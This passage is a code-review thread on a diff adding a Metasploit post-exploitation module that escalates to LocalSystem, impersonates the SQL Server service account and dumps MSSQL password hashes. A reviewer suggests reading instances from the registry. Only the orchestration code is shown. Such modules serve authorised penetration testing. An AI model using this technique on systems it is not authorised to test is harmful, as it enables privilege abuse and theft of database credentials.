modules/post/windows/manage/mssql_local_hashdump.rb

```diff
@@ -0,0 +1,430 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/auxiliary/report'
+require 'rex/proto/rfb'
+
+
+class Metasploit3 < Msf::Post
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::UserProfiles
+
+  VERSION_5 = Gem::Version.new('5.0')
+  VERSION_6 = Gem::Version.new('6.0')
+  VERSION_8 = Gem::Version.new('8.0')
+  VERSION_9 = Gem::Version.new('9.0')
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows Local SQL Server Password Hashes Dump',
+        'Description'   => %q{ This module extracts the usernames and password
+        hashes from a MSSQL server and stores them in the loot using the
+        same technique in mssql_local_auth_bypass (Credits: Scott Sutherland)
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [ 'Mike Manzotti <mike.manzotti[at]dionach.com>'],
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ]
+      ))
+
+    register_options(
+      [
+        OptString.new('INSTANCE',  [false, 'Name of target SQL Server instance', '']),
+      ], self.class)
+  end
+
+  def run
+
+    # Set verbosity level
+    verbose = datastore['VERBOSE'].to_s.downcase
+
+    # Set instance name (if specified)
+    instance = datastore['INSTANCE'].to_s.upcase
+
+    # Display target
+    print_status("Running module against #{sysinfo['Computer']}")
+
+    # Get LocalSystem privileges
+    system_status = givemesystem
+    if system_status[0]
+
+      # Check if a SQL Server service is running
+      service_instance = check_for_sqlserver(instance)
+      if service_instance != 0
+
+        # Identify available native SQL client
+        sql_client = get_sql_client()
+        if sql_client != 0
+
+          # Get Password Hashes
+          add_sql_status = get_sql_hash(sql_client,instance,service_instance,verbose)
+
+          # If Fail
+          if add_sql_status == 0
+
+            # Attempt to impersonate sql server service account (for sql server 2012)
+            impersonate_status = impersonate_sql_user(service_instance,verbose)
+            if impersonate_status == 1
+
+              # Get Password Hashes
+              get_sql_hash(sql_client,instance,service_instance,verbose)
+
+            end
+          end
+        end
+      end
+    else
+      print_error("Could not obtain LocalSystem privileges")
+    end
+
+    # return to original priv context
+    session.sys.config.revert_to_self
+  end
+
+
+  ## ----------------------------------------------
+  ## Method to check if the SQL Server service is running
+  ## ----------------------------------------------
+  def check_for_sqlserver(instance)
+
+    print_status("Checking for SQL Server...")
+
+    # Get Data
+    running_services = run_cmd("net start")
```

Comment:
In fact, it might make sense (given that you're looking for instances) to read from the registry instead. See here:

https://github.com/NetSPI/Powershell-Modules/blob/master/Get-MSSQLCredentialPasswords.psm1#L45